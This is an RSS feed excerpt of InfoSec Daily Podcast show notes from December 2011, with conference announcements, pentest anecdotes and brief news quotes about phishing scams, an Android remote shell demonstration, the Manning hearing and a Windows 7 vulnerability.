	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.msfn.org/_/security/hackers-may-develop-a-computer-virus-to-infe-r8865?"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.msfn.org/_/security/hackers-may-develop-a-computer-virus-to-infe-r8865?</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Synthetic biology&quot; is accelerating &quot;faster than computer technology&quot;, say experts who have warned that hackers could someday use it to develop a computer virus to bend human minds.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to Andrew Hessel of Singularity University on US space agency NASA&#39;s research campus, &quot;It could lead to a world where hackers could engineer viruses or bacteria to control human minds.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;This is one of the most powerful technologies in the world. Synthetic biology &#8212; the writing of life. I advocate cells are living computers and DNA is a programming language.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;I want to see life programmed and used to solve global challenges so that humanity can achieve a sustainable relationship within the biosphere. It&#39;s growing fast. It will grow faster than computer technologies.&quot;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">He predicts a world where people can &quot;print&quot; DNA, and even &quot;decode&quot; it. But he warned that viruses and bacteria send chemicals into human brains and could someday be used to influence, or even &quot;control&quot; people, &#39;Daily Mail&#39; reported.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A literal virus &#8212; injected into a &quot;host&quot; in the guise of a vaccine, say &#8212; could be used to control behaviour, says Hessel who warns people &quot;may&#39;ve to learn how to counterattack&quot; against such weapons.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://blog.trendmicro.com/seasons-warnings-iphone-4s-scam-and-other-holiday-threats"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.trendmicro.com/seasons-warnings-iphone-4s-scam-and-other-holiday-threats</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Looking for cheaper iPhone 4S this holiday season? Be wary, because cybercriminals can trick you into giving out your online financial credentials. We&rsquo;ve recently found a phishing attack that specifically targets users who are out to purchase an iPhone 4S through eBay.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The attack involves domains that display replicated eBay posts for iPhone 4S units. The screenshots below show a sample of the fake page, and the original eBay post from which the content was copied.</span><img height="267px;" src="https://lh4.googleusercontent.com/5Ry1y6eaBhOgZMjbzNAdRgSCpfyivhfqamU7txnwsazhNW8ZWQO7XptRrXBgH_4RSIr8lefnHeQXjdMAfOHaJZhSAEGWQZaFwhAubaMYoWktYNG3zKI" width="381px;" /></p>
<div dir="ltr">
<table style="border:none;border-collapse:collapse">
<colgroup>
<col width="389" />
<col width="170" /></colgroup>
</table>
</div>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-551-pentest-lessons-china-hacks-your-thermostat-mind-control-virus-cheap-iphones-gps-spoofing/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3295/0/infosec-daily-podcast-episode-551.mp3" length="20616190" type="audio/mpeg" />
		<itunes:duration>0:42:54</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 551 for December 21, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Karthik Rangarajan, and Varun Sharma.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;Hi[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 551 for December 21, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Karthik Rangarajan, and Varun Sharma.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	CampusCon 2012
	When: January 21, 2012
	Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland
	http://campuscon.hackingwit.com
	(from Baconzombie)
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	LayerOne
	When: May 26-27, 2012
	Where: Unannouced
	Los Angeles area
	http://www.layerone.org/
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	Pentest Lessons:
	Adam Compton &#38; Zac Wagle&#39;s should get credit for the &#34;Pentest Lessons&#34; idea. They also started a twitter account: https://twitter.com/pentestlessons. 
	Lesson 1: Don&#39;t blindly follow the intern&#39;s suggestions.
	Lesson 2: Don&#39;t enable the firewall on a host you&#39;ve compromised without first checking the rules to see if you&#39;re going to block your own connection to the host.
	Backstory: They popped a box via ColdFusion vuln and ran into an issue that required some network troubleshooting. The intern suggested turning on the firewall so they could use the logging to troubleshoot. They turn on the firewall and POP! No more connection. In addition, port 80 got blocked, so the customer&#39;s site went down as well. They had to call the customer to get the firewall turned back off.
	Lesson 3: Don&#39;t scan Polycom VOIP phones&#39; embedded web server with a web scanner or vulnerability scanner with web checks enabled. You will reboot every phone. The federal contractor I was working for had executives in all day conference calls with their government clients. Their conference calls were rudely cut short.
	Lesson 4: Your company&#8217;s network is most secure when all of the employees are on vacation.
	Lesson 5: Do not copy content from one pentest report to another. Saving 10 minutes is not worth getting fired.
	Lesson 6: Do not copy a PDF from an OpenOffice Word to an Office XP into an Office 2011. Its hell to read for anyone else, and crashes systems. 
	&#160;
Stories
Source: http://online.wsj.com/article/SB10001424052970204058404577110541568535300.html
	In Beijing, Foreign Ministry spokesman Liu Weimin said at a daily briefing that he hadn&#39;t heard about the matter, though he repeated that Chinese law forbids hacker attacks. He added that China wants to coope[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 550 &#8211; Armitage Easy, Android Shell, Unfollow, Manning Update, Nothing, Windows 7 0-day &amp; MIT CryptDB</title>
		<link>http://www.isdpodcast.com/episode-550-armitage-easy-android-shell-unfollow-manning-update-nothing-windows-7-0-day-mit-cryptdb</link>
		<comments>http://www.isdpodcast.com/episode-550-armitage-easy-android-shell-unfollow-manning-update-nothing-windows-7-0-day-mit-cryptdb#comments</comments>
		<pubDate>Wed, 21 Dec 2011 01:55:18 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3291</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 550 for December 20, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Beau Woods, Karthik Rangarajan, and Themson Mester. &#160; Announcements: Brad Smith (theNurse) We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 550 for December 20, 2011. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Beau Woods, Karthik Rangarajan, and Themson Mester.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CampusCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland</span><br />
	<a href="http://campuscon.hackingwit.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://campuscon.hackingwit.com</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">(from Baconzombie)</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code:</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://dl.packetstormsecurity.net/papers/general/Armitage-hacking_made_easy_Part-1.pdf"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://dl.packetstormsecurity.net/papers/general/Armitage-hacking_made_easy_Part-1.pdf</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://threatpost.com/en_us/blogs/gaining-remote-shell-android-122011"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://threatpost.com/en_us/blogs/gaining-remote-shell-android-122011</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The security of Android devices has come under quite a lot of scrutiny in recent months, with researchers identifying various root exploits and permission leaks that could be exploited. In this video, researcher </span><a href="http://viaforensics.com/security/nopermission-android-app-remote-shell.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Thomas Cannon of ViaForensics</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> demonstrates a method for setting up a remote shell on an Android device without using any exploits or vulnerabilities. The method works on various versions of Android, up to and including Gingerbread.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span><a href="http://blog.trendmicro.com/new-unfollowed-you-scam-hits-twitter-trending-topics"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.trendmicro.com/new-unfollowed-you-scam-hits-twitter-trending-topics</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Twitter&lsquo;s list of trending topics appears to have been hit hard by another variant of the familiar &ldquo;see who unfollowed you&rdquo; scam:</span><img height="289px;" src="https://lh5.googleusercontent.com/xu2rGvLv2pnMe9y4izqUwau4EbdHahxZBBEkAyN4jJxNJxuoAXLuhw_7LYw7nepWwsAsRpbj9qJzwmWBM1oREN_rhp5eApBn2DLo_LySTc0SxbLYEOI" width="542px;" /><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Significant numbers of Tweets are being sent out that contain the above message: saying that a certain number of people have unfollowed them, and to find out who unfollowed you, click on the link. A few hashtags were generally attached to the end of the tweet.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">What happens when you click on the link? You are redirected to a page for a &ldquo;Followers Monitor&rdquo;, which leads eventually to a page asking you to authorize an application to use your Twitter account. This rogue application is able to carry out such &ldquo;minor&rdquo; operations as reading your tweets, updating your profile, and even posting tweets on your behalf. If you actually give the app access, of course, the first thing it will do is post its own version of the spammed Tweet.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span><a href="http://www.cnn.com/2011/12/20/us/bradley-manning-hearing/index.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.cnn.com/2011/12/20/us/bradley-manning-hearing/index.html</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A convicted computer hacker from California testified Tuesday in Pfc. Bradley Manning&#39;s preliminary hearing about six days of chats he conducted with someone who claimed to have leaked classified information and was &quot;looking to brag about what they had done.&quot;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Adrian Lamo said he traded instant messages in a chat format with someone self-identified as Bradass87. Lamo testified that based on an e-mail he received from Manning, as well as an examination of Manning&#39;s Facebook page, that Bradass87 was Manning.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The testimony came on the fourth day of the preliminary hearing, which will determine if Manning proceeds to a full military court-martial.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Manning is accused of stealing and leaking more than a quarter of a million classified documents from the State Department and the Defense Department to the WikiLeaks website, the biggest intelligence leak in U.S. history.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Army Criminal Investigation Command Special Agent David Shaver later testified that the chat logs that Lamo provided to the Army largely matched chat logs found on Manning&#39;s computer in Iraq.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The prosecution did not ask Lamo any specific questions about the chats themselves, but did establish that he was diagnosed with Asperger&#39;s syndrome and takes medication for it. At one point he admitted overusing his medication to the point that his parents became concerned and he eventually was put in an involuntary psychiatric hold for three days.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://miguelalmeida.net/2011/12/what-will-change-in-security-in-2012.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://miguelalmeida.net/2011/12/what-will-change-in-security-in-2012.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">What will change in security in 2012? &nbsp;In essence, in one word: nothing. The attacks will be essentially the same, although it is likely they&#39;ll become more sophisticated, and the defenses, in practice, will also be the same. Why? Because security is only strengthened when people are afraid. This is a fact. Fear. Fear for your life or the life of your relatives and friends, fear for the loss of financial assets, and fear for the loss of power and peer recognition. And despite the evolution of current threats and attacks, we&#39;ve not yet reached a level of chaos, widespread chaos, which would trigger those emotions. In 2012? No. Not yet. But I don&#39;t think we&#39;re improving our defenses substantially to avoid this scenario. Why? Because, oddly enough, we&#39;re not afraid to be afraid.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#444444;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://threatpost.com/en_us/blogs/researchers-warn-new-windows-7-vulnerability-122011"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://threatpost.com/en_us/blogs/researchers-warn-new-windows-7-vulnerability-122011</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Researchers are warning about a new remotely exploitable vulnerability in 64-bit Windows 7 that can be used by an attacker to run arbitrary code on a vulnerable machine. The bug was first reported a couple of days ago by an independent researcher and confirmed by Secunia.</span><br />
